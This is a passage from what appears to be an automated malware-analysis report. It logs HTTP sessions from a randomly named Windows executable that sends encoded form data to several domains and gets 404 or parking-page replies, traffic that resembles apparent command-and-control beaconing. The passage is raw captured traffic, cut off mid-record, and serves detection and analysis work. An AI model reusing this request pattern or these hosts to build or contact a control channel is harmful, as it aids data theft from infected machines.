72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49941	209.74.77.109	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:11.322449923 CET	1782	OUT	POST /m85b/ HTTP/1.1 Host: www.luxuryliving.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luxuryliving.website Referer: http://www.luxuryliving.website/m85b/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 63 52 69 46 76 2f 7a 61 66 6a 4c 30 7a 55 72 52 74 35 75 54 74 32 32 6c 58 42 6a 37 66 57 43 2b 59 6b 6e 2f 5a 71 64 54 57 75 68 6d 58 79 59 39 6a 39 7a 69 64 65 56 52 32 55 4f 73 6c 4b 53 47 44 69 58 44 75 6a 4d 70 35 4e 72 46 61 43 4e 42 4c 37 6e 6c 73 58 43 73 43 61 63 43 55 62 58 37 34 2b 6e 62 72 38 53 39 36 41 30 54 59 69 64 59 62 77 41 42 68 2b 39 75 52 58 4d 6c 49 4d 69 50 59 52 6d 4f 35 71 30 33 68 74 5a 38 55 65 4a 58 77 71 50 4f 48 75 78 6c 4c 70 62 42 70 64 71 6a 73 53 35 63 75 71 33 63 79 79 4c 33 4f 61 6b 43 64 73 52 4b 47 53 72 45 71 4a 65 33 4d 32 7a 62 68 32 36 52 76 4c 48 56 7a 4c 4f 38 33 2f 46 4a 64 4d 53 77 65 67 62 74 32 4a 42 2b 49 6d 41 41 6f 37 54 43 47 4e 6c 56 69 4f 39 6e 48 58 63 36 31 49 4e 61 59 63 38 6e 71 2b 63 37 4b 78 52 70 6d 72 46 5a 47 37 39 4f 36 50 7a 76 75 78 70 6d 7a 50 67 59 76 4d 55 68 57 5a 37 64 61 32 54 76 37 77 4c 56 4e 50 6c 76 47 77 2b 57 65 76 54 35 31 35 30 67 39 51 2f 70 2b 76 36 35 65 48 58 50 50 46 79 71 54 79 33 75 4a 70 44 [TRUNCATED] Data Ascii: 3DkHhn=cRiFv/zafjL0zUrRt5uTt22lXBj7fWC+Ykn/ZqdTWuhmXyY9j9zideVR2UOslKSGDiXDujMp5NrFaCNBL7nlsXCsCacCUbX74+nbr8S96A0TYidYbwABh+9uRXMlIMiPYRmO5q03htZ8UeJXwqPOHuxlLpbBpdqjsS5cuq3cyyL3OakCdsRKGSrEqJe3M2zbh26RvLHVzLO83/FJdMSwegbt2JB+ImAAo7TCGNlViO9nHXc61INaYc8nq+c7KxRpmrFZG79O6PzvuxpmzPgYvMUhWZ7da2Tv7wLVNPlvGw+WevT5150g9Q/p+v65eHXPPFyqTy3uJpDIstI6cU39aui6AVrNImqg/zITnqLvUInLIaxeEzCXlrTsIX6ZD52FJJSv5pog0mQS6AzkZ7l79ad8bzVUnU78D2i4k6FhR89Y/6wEyQtrfe/R6YAtNTDXUUZnZJeECmtpD3FowweBI/itEppMg2EQCon/zOxF0ABSd5h9Yu6MSOMmQL8d1dwfO8j4DaQhoqwU3kKJ4p8MXOsySoBOaIGv7giSyzCGctvG6yycdeEeOfgHx8BGAALcL5fmEpjJ/Kxa9DJBGHJNkUHGrueRqbamvPlm9J8FV7uFIh/Y1OlZDyX1FY8KKS0tE235IEIeWd8cztnfI+82QndpfCC9Nw1PXyudkpVm3wFSVcIgEMcHFhZppYO7zXTiD3SU86yYmvTP3x0oq8qpqX5YfN/HDXjzsBMCHWHmbjrIY3IUojSGJggnkcprTf/8mU/EjU2ECiBny0bl7NdL3GpbFskRCUY5uHI4xcZItLJI51bPNnPnd7dpXVWAZgizIPiSv1tOALQyDPvuhlzI2VsXjPo4AHfTYZX1H5sYKKKFiOY9I7fyLPVcRbGSzg3hqLLkStuJc/+gfMlGdHYSG7UdXyLNb/C1vPjyitlcZSxexpY371rJ+9p9qGSrE9XPdhZTyO1FzVCAxzwb8IroHefFpAFGdEsI/q0K0VdXnwdG0 [TRUNCATED]
Jan 11, 2025 09:23:11.904377937 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:23:11 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49957	209.74.77.109	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:13.874752045 CET	472	OUT	GET /m85b/?3DkHhn=RTKlsIHwI0zh00zNoZz82n6YKC/FVn63bGL7eLxLdINoTiozmJDsVcxe+nKMoKClO37Gg1Am4qT+EilmX6Glt3+WO5cQJZz5qMzXuYr/wgoBbWBPZiwEopFeQ3Q/Mtz8GQ==&jH4x=86JHl HTTP/1.1 Host: www.luxuryliving.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Jan 11, 2025 09:23:14.440572977 CET	548	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:23:14 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49992	199.59.243.228	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:19.564755917 CET	751	OUT	POST /8fw9/ HTTP/1.1 Host: www.dating-apps-az-dn5.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.dating-apps-az-dn5.xyz Referer: http://www.dating-apps-az-dn5.xyz/8fw9/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 74 76 41 34 4c 38 55 4c 6c 67 67 48 74 2f 55 74 56 6d 33 64 6e 69 6e 49 51 79 4c 38 46 7a 51 7a 71 47 30 76 39 4f 2f 2b 42 48 4d 63 6f 61 6a 36 32 35 34 47 62 39 4e 4d 76 6c 6e 48 51 4a 59 56 63 55 53 6c 4f 42 50 79 31 6b 73 58 33 55 2f 65 6c 6c 34 75 62 77 48 39 46 4e 6b 44 45 62 31 56 72 41 2b 52 70 32 30 45 41 58 33 58 65 77 6e 53 70 51 7a 4a 45 6f 46 47 30 4f 46 56 63 6e 2b 68 70 63 32 4c 2b 34 41 79 41 39 77 71 7a 68 43 4e 55 38 67 32 75 5a 4a 58 73 47 77 6c 4a 38 39 32 43 48 56 44 4e 53 6b 36 6a 78 74 62 77 6b 31 4f 4b 53 51 70 4f 6d 50 33 4e 57 63 58 46 30 6b 38 61 31 56 63 71 7a 63 3d Data Ascii: 3DkHhn=tvA4L8ULlggHt/UtVm3dninIQyL8FzQzqG0v9O/+BHMcoaj6254Gb9NMvlnHQJYVcUSlOBPy1ksX3U/ell4ubwH9FNkDEb1VrA+Rp20EAX3XewnSpQzJEoFG0OFVcn+hpc2L+4AyA9wqzhCNU8g2uZJXsGwlJ892CHVDNSk6jxtbwk1OKSQpOmP3NWcXF0k8a1Vcqzc=
Jan 11, 2025 09:23:20.012846947 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 08:23:19 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 6b3ce9d1-371b-4483-a8c4-29e9d8434650 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlfZeKMjVPrFFOO2q5xqV5rURkceFjrxMZrfqG4P9KIDBHSdPP0/mDNNmuAPWeSMh8H/1Y+0CZPRrQC89DGR+g== set-cookie: parking_session=6b3ce9d1-371b-4483-a8c4-29e9d8434650; expires=Sat, 11 Jan 2025 08:38:19 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 6c 66 5a 65 4b 4d 6a 56 50 72 46 46 4f 4f 32 71 35 78 71 56 35 72 55 52 6b 63 65 46 6a 72 78 4d 5a 72 66 71 47 34 50 39 4b 49 44 42 48 53 64 50 50 30 2f 6d 44 4e 4e 6d 75 41 50 57 65 53 4d 68 38 48 2f 31 59 2b 30 43 5a 50 52 72 51 43 38 39 44 47 52 2b 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlfZeKMjVPrFFOO2q5xqV5rURkceFjrxMZrfqG4P9KIDBHSdPP0/mDNNmuAPWeSMh8H/1Y+0CZPRrQC89DGR+g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 09:23:20.012866974 CET	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmIzY2U5ZDEtMzcxYi00NDgzLWE4YzQtMjllOWQ4NDM0NjUwIiwicGFnZV90aW1lIjoxNzM2NTgzNz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49995	199.59.243.228	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:22.142438889 CET	771	OUT	POST /8fw9/ HTTP/1.1 Host: www.dating-apps-az-dn5.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.dating-apps-az-dn5.xyz Referer: http://www.dating-apps-az-dn5.xyz/8fw9/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 74 76 41 34 4c 38 55 4c 6c 67 67 48 73 66 6b 74 53 42 6a 64 6d 43 6e 50 4d 69 4c 38 50 54 51 33 71 47 6f 76 39 50 36 68 47 30 6f 63 72 2f 6e 36 77 49 34 47 58 64 4e 4d 38 6c 6e 65 66 70 59 6b 63 55 66 47 4f 46 54 79 31 69 41 58 33 56 50 65 6c 32 67 76 61 67 48 37 4a 74 6b 37 4c 37 31 56 72 41 2b 52 70 32 49 75 41 58 50 58 65 6c 33 53 37 42 7a 4f 61 34 46 4a 7a 4f 46 56 57 48 2b 74 70 63 33 6d 2b 39 5a 58 41 2f 49 71 7a 6b 6d 4e 55 74 67 78 68 5a 4a 52 7a 57 78 33 43 73 4d 45 45 45 49 68 57 78 49 63 72 69 74 53 34 79 45 6b 51 77 59 76 4e 6d 6e 63 4e 56 30 68 41 44 35 55 41 57 46 73 30 6b 4a 5a 64 75 6b 36 69 6c 79 62 59 51 73 6c 30 35 33 52 74 46 76 30 Data Ascii: 3DkHhn=tvA4L8ULlggHsfktSBjdmCnPMiL8PTQ3qGov9P6hG0ocr/n6wI4GXdNM8lnefpYkcUfGOFTy1iAX3VPel2gvagH7Jtk7L71VrA+Rp2IuAXPXel3S7BzOa4FJzOFVWH+tpc3m+9ZXA/IqzkmNUtgxhZJRzWx3CsMEEEIhWxIcritS4yEkQwYvNmncNV0hAD5UAWFs0kJZduk6ilybYQsl053RtFv0
Jan 11, 2025 09:23:22.576590061 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 08:23:21 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 4618a9d2-e215-4ea6-80b2-163f0a12a064 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlfZeKMjVPrFFOO2q5xqV5rURkceFjrxMZrfqG4P9KIDBHSdPP0/mDNNmuAPWeSMh8H/1Y+0CZPRrQC89DGR+g== set-cookie: parking_session=4618a9d2-e215-4ea6-80b2-163f0a12a064; expires=Sat, 11 Jan 2025 08:38:22 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 6c 66 5a 65 4b 4d 6a 56 50 72 46 46 4f 4f 32 71 35 78 71 56 35 72 55 52 6b 63 65 46 6a 72 78 4d 5a 72 66 71 47 34 50 39 4b 49 44 42 48 53 64 50 50 30 2f 6d 44 4e 4e 6d 75 41 50 57 65 53 4d 68 38 48 2f 31 59 2b 30 43 5a 50 52 72 51 43 38 39 44 47 52 2b 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlfZeKMjVPrFFOO2q5xqV5rURkceFjrxMZrfqG4P9KIDBHSdPP0/mDNNmuAPWeSMh8H/1Y+0CZPRrQC89DGR+g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 09:23:22.576646090 CET	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDYxOGE5ZDItZTIxNS00ZWE2LTgwYjItMTYzZjBhMTJhMDY0IiwicGFnZV90aW1lIjoxNzM2NTgzOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49996	199.59.243.228	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:24.850862980 CET	1788	OUT	POST /8fw9/ HTTP/1.1 Host: www.dating-apps-az-dn5.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.dating-apps-az-dn5.xyz Referer: http://www.dating-apps-az-dn5.xyz/8fw9/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 74 76 41 34 4c 38 55 4c 6c 67 67 48 73 66 6b 74 53 42 6a 64 6d 43 6e 50 4d 69 4c 38 50 54 51 33 71 47 6f 76 39 50 36 68 47 30 67 63 72 4e 76 36 7a 72 41 47 55 64 4e 4d 6e 46 6e 62 66 70 59 35 63 55 47 50 4f 43 61 51 31 6e 63 58 32 33 33 65 31 58 67 76 50 77 48 37 55 64 6b 41 45 62 31 4d 72 41 75 56 70 32 34 75 41 58 50 58 65 6b 48 53 72 67 7a 4f 59 34 46 47 30 4f 46 5a 63 6e 2f 79 70 66 47 54 2b 39 56 70 41 72 30 71 7a 45 57 4e 57 66 59 78 2b 70 4a 54 77 57 77 79 43 73 41 66 45 45 56 51 57 77 38 6d 72 69 6c 53 34 30 68 66 45 67 4d 6e 65 56 53 6a 56 31 30 78 48 77 42 30 49 32 4a 36 75 30 56 55 4c 34 38 61 6b 55 75 33 63 79 41 6f 33 75 37 44 67 43 71 59 61 78 6b 42 6e 6a 4a 68 39 4e 67 6b 79 79 38 56 47 51 6d 48 47 55 65 6c 43 4f 7a 4c 70 76 38 6e 6c 4e 52 38 67 57 54 67 36 64 4b 58 74 43 39 35 37 4a 58 6f 6c 77 45 73 72 6f 69 71 38 67 67 6b 37 6f 61 37 6d 73 61 68 75 76 4c 32 61 78 63 54 66 35 45 38 66 73 2f 63 58 2b 55 76 47 61 75 53 41 4c 46 52 56 48 73 39 37 5a 48 39 78 58 33 [TRUNCATED] Data Ascii: 3DkHhn=tvA4L8ULlggHsfktSBjdmCnPMiL8PTQ3qGov9P6hG0gcrNv6zrAGUdNMnFnbfpY5cUGPOCaQ1ncX233e1XgvPwH7UdkAEb1MrAuVp24uAXPXekHSrgzOY4FG0OFZcn/ypfGT+9VpAr0qzEWNWfYx+pJTwWwyCsAfEEVQWw8mrilS40hfEgMneVSjV10xHwB0I2J6u0VUL48akUu3cyAo3u7DgCqYaxkBnjJh9Ngkyy8VGQmHGUelCOzLpv8nlNR8gWTg6dKXtC957JXolwEsroiq8ggk7oa7msahuvL2axcTf5E8fs/cX+UvGauSALFRVHs97ZH9xX3mWG+oQYh+PrisWEkQj0g+dsjmyzxvDnHm4/Y5hBdmwJtYGQ8cqyJNFg7Vu9BeaXRfU2eB1hU4tnB6necWZ23oPxLq6ziba8YcYVQiwG8RCh9L5IYYZbNaLbx+cAvDZZVUklaoaiZTU9nOIccHczRK0zavfzIVgn8Cyvbs9vyZmJbN9czRus88t8WyyMw4uU/v17QGPq1Ta5Y30oqjczFG94WQoSqhFR0QcHBUaKxcSd6vlFNP5uMdqmpW1OIpv46fREh/q2k0kV6x+ORrAxzUwk3/KmL0YJEctWT3fc0cBpVtbPH0Sug3sqof1W/szXWcrSsAb4igWBa9+u8ZFkKFGFSjUf6swWz7tRbLwKIbk11rDjhKxEHAWhML8cl+WIctVWR4RU2H9HhXiD+wADDHaSrgwCBIoaPnPFOtlbZPfemLvR5fkUy5vyxtg3fpm8kt+21AKDGUdWbdyKNDHJnvEgIpgGgdpSRoY96FufJ4TtQOTXe/Cb/UfWH5BO94tgT2CiVDo/z+QW/DTjBllrK7M3Eo/BMyA43yFWe8/By/ipn/j5VQX7X3A2awdr5gBqPOpJ8w20kBtkgo/NnjvHS0we0qkxe8psJUXy5Xag94zM9VGtj9oeRbmvf42mCr+FrhOQCwxeuy5cPwgzNFSd8J1CoWUDp/BvP2I [TRUNCATED]
Jan 11, 2025 09:23:25.312596083 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 08:23:24 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 544dcea2-41ca-44b5-a16e-b54bc07e2779 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlfZeKMjVPrFFOO2q5xqV5rURkceFjrxMZrfqG4P9KIDBHSdPP0/mDNNmuAPWeSMh8H/1Y+0CZPRrQC89DGR+g== set-cookie: parking_session=544dcea2-41ca-44b5-a16e-b54bc07e2779; expires=Sat, 11 Jan 2025 08:38:25 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 6c 66 5a 65 4b 4d 6a 56 50 72 46 46 4f 4f 32 71 35 78 71 56 35 72 55 52 6b 63 65 46 6a 72 78 4d 5a 72 66 71 47 34 50 39 4b 49 44 42 48 53 64 50 50 30 2f 6d 44 4e 4e 6d 75 41 50 57 65 53 4d 68 38 48 2f 31 59 2b 30 43 5a 50 52 